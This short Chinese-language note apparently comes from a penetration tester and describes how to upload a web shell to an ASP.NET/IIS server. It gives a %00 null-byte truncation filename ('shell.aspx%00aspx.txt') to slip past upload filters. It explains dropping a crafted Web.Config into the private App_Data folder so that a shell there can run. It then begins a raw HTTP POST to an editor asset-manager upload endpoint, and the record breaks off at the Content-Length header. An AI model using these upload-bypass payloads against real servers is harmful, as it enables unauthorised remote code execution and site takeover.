1.添加%00截断绕过：

shell.aspx%00aspx.txt

2.添加配置文件 

App_Data包含应用程序数据文件，包括.mdf数据库文件、XML文件和其他数据存储文件#

#ASP.NET使用App_Data文件夹来存储应用程序的本地数据库，例如用于维护成员身份和角色信息的数据库#

#App_Data文件夹不像主目录下的其他网站目录那样是公共的#

#因为它是一个私有目录，IIS服务器出于安全原因将其隐藏#

#现在，我们将测试是否存在这样的目录#

#如果目录存在，我们将把它公开，这样我们就可以定义在其中运行shell所需的服务器函数#

#为此，我们将尝试加载一个特殊的服务器配置文件。这是一个Web.Config文件。有了这个，我们将绕过目录隐私#

#因此，该目录将是公共的，它将能够响应外部查询并运行shell。

 

POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length